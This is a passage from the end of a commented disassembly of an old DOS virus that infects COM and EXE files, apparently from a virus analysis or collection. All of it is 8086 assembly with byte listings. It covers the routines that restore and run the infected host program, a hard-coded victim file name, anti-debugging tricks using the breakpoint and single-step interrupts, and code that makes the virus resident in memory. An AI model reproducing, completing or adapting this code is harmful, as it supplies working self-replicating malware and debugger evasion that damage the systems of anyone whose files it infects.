	je	l_18E5						;18E0 74 03
	jmp	short l_1953		;-> ?			;18E2 EB 6F
	nop							;18E4 90
;================================================================
;	End of virus code - file *.COM
;----------------------------------------------------------------
l_18E5:	popf							;18E5 9D
	pop	ds						;18E6 1F
	pop	es						;18E7 07
	pop	cx						;18E8 59
	pop	bx						;18E9 5B
	mov	word ptr cs:[5B4h],100h	;l_1934 = victim IP	;18EA 2E: C7 06 05B4 0100
	mov	ax,es						;18F1 8C C0
	mov	word ptr cs:[5B6h],ax	;l_1936 = victim CS	;18F3 2E: A3 05B6
	call	s_16CA			;init registers		;18F7 E8 FDD0
	jmp	dword ptr cs:[5B4h]	;l_1934 -> run victim	;18FA 2E: FF 2E 05B4
					;<--- victim name
d_057F	db	'A:\SYS.COM'					;18FF 41 3A 5C 53 59 53
								;1905 2E 43 4F 4D
	db	0,'XE',0,'E',0					;1909 00 58 45 00 45 00
	db	9 dup (0)					;190F 0009[00]
;================================================================
;	ANTYDEBUG - make virus resident
;----------------------------------------------------------------
s_1918	proc	near
	cmp	ax,3000h					;1918 3D 3000
	jne	l_1925			;-> int 3		;191B 75 08
	call	s_17BB			;-> make virus resident	;191D E8 FE9B
	retn							;1920 C3
s_1918	endp
d_05A1	dw	 002Ah			;victim SS (rel)	;1921 2A 00
d_05A3	dw	 1388h			;victim SP		;1923 88 13
;================================================================
;	ANTYDEBUG - call int 3 (Breakpoint)
;----------------------------------------------------------------
s_1925	proc	near
l_1925:	mov	ax,3000h		;Flag register		;1925 B8 3000
	push	ax						;1928 50
l_1929:	call	dword ptr es:[0Ch]	;int 3 (Breakpoint)	;1929 26: FF 1E 000C
	cmp	ax,3000h					;192E 3D 3000
	jne	l_1929						;1931 75 F6
	retn							;1933 C3
s_1925	endp
d_05B4	dw	 0000h			;victim IP		;1934 00 00
d_05B6	dw	 000Bh			;victim CS (rel)	;1936 0B 00
;================================================================
;	Make virus resident
;----------------------------------------------------------------
s_1938	proc	near
	push	es						;1938 06
	call	s_1948			;-> INT 1 (single step)	;1939 E8 000C
	cmp	ax,0						;193C 3D 0000
	jne	l_1947						;193F 75 06
	call	s_1925			;-> INT 3 (Breakpoint)	;1941 E8 FFE1
	call	s_1918			;-> reside virus	;1944 E8 FFD1
l_1947:	pop	es						;1947 07
;================================================================
;	ANTYDEBUG - call int 1 = Single Step
;----------------------------------------------------------------
s_1948:	pushf							;1948 9C
	xor	ax,ax						;1949 33 C0
	mov	es,ax						;194B 8E C0
	call	dword ptr es:[4h]	;int 1			;194D 26: FF 1E 0004
	retn							;1952 C3
s_1938	endp
;================================================================
;	End of virus code - file *.EXE
;----------------------------------------------------------------
l_1953:	popf							;1953 9D
	pop	ds						;1954 1F
	pop	es						;1955 07
	pop	cx						;1956 59
	pop	bx						;1957 5B
	mov	ax,es						;1958 8C C0
	add	ax,10h			;relocating value	;195A 05 0010
	mov	dx,ax						;195D 8B D0
	mov	bp,word ptr cs:[5A1h]	;l_1921 = victim SS	;195F 2E: 8B 2E 05A1
	add	bp,ax						;1964 03 E8
	mov	ss,bp						;1966 8E D5
	mov	bp,word ptr cs:[5A3h]	;l_1923 = victim SP	;1968 2E: 8B 2E 05A3
	mov	sp,bp						;196D 8B E5
	mov	ax,dx						;196F 8B C2
	add	word ptr cs:[5B6h],ax	;l_1936 - CS relocation	;1971 2E: 01 06 05B6
	call	s_16CA			;init registers		;1976 E8 FD51
	jmp	dword ptr cs:[5B4h]	;-> run victim		;1979 2E: FF 2E 05B4
	db	20 dup (0)		;COM file stack		;197E 0014[00]
d_0612	label	byte						;1992h
seg_a	ends
	end	start
------------------------------------------------------------------------------